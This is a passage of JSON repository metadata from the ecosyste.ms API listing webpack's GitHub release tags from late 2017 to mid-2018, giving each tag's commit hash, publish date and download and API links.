d":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/